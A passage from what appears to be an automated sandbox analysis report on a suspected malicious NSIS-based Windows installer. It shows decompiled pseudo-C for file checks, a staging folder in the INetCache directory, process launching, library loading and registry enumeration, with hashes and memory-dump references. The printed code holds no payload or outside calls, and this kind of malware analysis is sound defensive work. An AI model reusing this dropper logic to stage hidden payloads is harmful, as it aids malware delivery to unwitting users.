								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406282(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry\\Agrafferne",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x00402245
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402ac2
0x00402ace

APIs

Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405C0C
Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne, xrefs: 00401640

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne
API String ID: 1892508949-282784380
Opcode ID: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
Opcode Fuzzy Hash: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405C5B(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406282(0x42fa50, _a4);
				_t21 = E00405BFE(0x42fa50);
				if(_t21 != 0) {
					E00406516(_t21);
					if(( *0x434efc & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa50);
							_push(0x42fa50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004065C5();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B9F(0x42fa50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B53();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405c67
0x00405c72
0x00405c76
0x00405c7d
0x00405c89
0x00405c99
0x00405c9b
0x00405cb3
0x00405cb4
0x00405cbb
0x00405cbc
0x00000000
0x00000000
0x00405c9f
0x00405ca6
0x00405cae
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ca6
0x00405cbe
0x00405cc4
0x00000000
0x00405cd2
0x00405c8b
0x00405c91
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c91
0x00405c78
0x00000000

APIs

Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F

Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405C0C
Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29

lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405CB4
GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420), ref: 00405CC4

Strings

C:\, xrefs: 00405C61, 00405C66, 00405C6C, 00405CAD, 00405CB3, 00405CBB, 00405CC3

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D

Uniqueness

Uniqueness Score: -1.00%

Function 00405867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405867(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430250->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430250,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405870
0x00405890
0x00405898
0x0040589d
0x00000000
0x004058a3
0x004058a7

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
CloseHandle.KERNEL32(?), ref: 0040589D

Strings

Error launching installer, xrefs: 0040587A

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fb8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E004066CB( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052E6(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdd4, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403930( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040202c
0x0040202c
0x00402031
0x00402038
0x004020f7
0x00402245
0x00402245
0x00402abf
0x00402ac2
0x00402ace
0x00402ace
0x00402047
0x00402051
0x00402054
0x00402064
0x00402068
0x00402070
0x00402073
0x004020f0
0x00000000
0x004020f0
0x00402075
0x00402080
0x00402084
0x004020c4
0x00402086
0x00402089
0x0040208c
0x004020b8
0x0040208e
0x00402091
0x0040209a
0x0040209c
0x0040209c
0x0040209a
0x0040208c
0x004020cc
0x004020e5
0x004020e5
0x00000000
0x004020cc
0x00402057
0x0040205f
0x00402062
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057

Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,0040325E), ref: 00405341
Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 00405353
Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
Opcode Fuzzy Hash: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40cdd4; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E004062A4(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
						_t12 =  *0x40cdd4; // 0x0
						 *_t34 = _t12;
						 *0x40cdd4 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E00406282(_t33, _t3);
							_push(_t30);
							 *0x40cdd4 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = L"Call";
								E00406282(_t36, _t30 + 4);
								_t22 =  *0x40cdd4; // 0x0
								E00406282(_t32, _t22 + 4);
								_t25 =  *0x40cdd4; // 0x0
								_push(_t36);
								_push(_t25 + 4);
								E00406282();
								L15:
								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004062A4(_t28, _t30, _t33, _t28, 0xffffffe8));
					E004058E4();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b71
0x00401b71
0x00401b74
0x00401b7c
0x00401bc5
0x00401bf3
0x00401bfc
0x00401bfe
0x00401c02
0x00401c07
0x00401c0c
0x00401c0e
0x00401bc7
0x00401bc9
0x00402885
0x00401bcf
0x00401bcf
0x00401bd4
0x00401bdb
0x00401bdc
0x00401be1
0x00401be1
0x00401bc9
0x00000000
0x00401b7e
0x00401b7e
0x00401b7e
0x00401b81
0x00000000
0x00000000
0x00401b87
0x00401b8b
0x00000000
0x00401b8d
0x00401b8f
0x00000000
0x00401b95
0x00401b95
0x00401b98
0x00401b9f
0x00401ba4
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbc
0x004029db
0x00402abf
0x00402ac2
0x00402ac8
0x00402ac8
0x00401b8f
0x00000000
0x00401b8b
0x004022de
0x004022eb
0x004022ec
0x004022f1
0x004022f1
0x00402aca
0x00402ace

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BE1
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3

Strings

Call, xrefs: 00401B98, 00401B9E, 00401BB8

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 4d724161d6c5fb6bf4308d59b78a47a2fd90d80afd9eda06c823efa961cbcd01
Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
Opcode Fuzzy Hash: 4d724161d6c5fb6bf4308d59b78a47a2fd90d80afd9eda06c823efa961cbcd01
Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402253 Relevance: 4.6, APIs: 3, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402253() {
				WCHAR* _t34;
				WCHAR* _t37;
				WCHAR* _t39;
				void* _t41;

				_t39 = E00402C37(_t34);
				_t37 = E00402C37(0x11);
				 *((intOrPtr*)(_t41 + 8)) = E00402C37(0x23);
				if(E004065C5(_t39) != 0) {
					 *(_t41 - 0x68) =  *(_t41 - 8);
					 *((intOrPtr*)(_t41 - 0x64)) = 2;
					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
					_t27 =  *((intOrPtr*)(_t41 + 8));
					 *(_t41 - 0x60) = _t39;
					 *(_t41 - 0x5c) = _t37;
					 *((intOrPtr*)(_t41 - 0x4e)) =  *((intOrPtr*)(_t41 + 8));
					 *((short*)(_t41 - 0x58)) =  *((intOrPtr*)(_t41 - 0x20));
					E004052E6(_t34, _t27);
					if(SHFileOperationW(_t41 - 0x68) != 0) {
						goto L1;
					}
				} else {
					L1:
					E004052E6(0xfffffff9, _t34); // executed
					 *((intOrPtr*)(_t41 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}

0x0040225b
0x00402264
0x0040226c
0x00402276
0x00402289
0x0040228c
0x00402299
0x004022a3
0x004022a8
0x004022b1
0x004022b4
0x004022b7
0x004022ba
0x004022be
0x004022cf
0x00000000
0x004022d5
0x00402278
0x00402278
0x0040227b
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

Part of subcall function 004065C5: FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420), ref: 004065D0
Part of subcall function 004065C5: FindClose.KERNELBASE(00000000), ref: 004065DC

lstrlenW.KERNEL32 ref: 00402293
lstrlenW.KERNEL32(00000000), ref: 0040229E
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022C7

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 100f20cb576f4d253ceaa7ced30c6e41c51c1835eebf70f24b471d5ee0ebf506
Instruction ID: 7b2fc1264b4fb0dc72f9b007f51c651f6a3d170a065e006ef865ab6f7e8bf7d8
Opcode Fuzzy Hash: 100f20cb576f4d253ceaa7ced30c6e41c51c1835eebf70f24b471d5ee0ebf506
Instruction Fuzzy Hash: D6117C71904308AADB10EFF99E49A9EB7B8AF14354F10457FA405FB2D1E6BCD8408B59

Uniqueness

Uniqueness Score: -1.00%

Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff); // executed
					}
					_t24[0x3ff] = _t16;
					_push(_t22); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x004024f2
0x004024f2
0x004024f2
0x004024f7
0x004024fe
0x00402500
0x00402508
0x0040250b
0x0040250e
0x00402885
0x00402514
0x0040251c
0x0040251f
0x00402538
0x0040253e
0x00402540
0x00402542
0x00402542
0x00402521
0x00402525
0x00402525
0x00402549
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
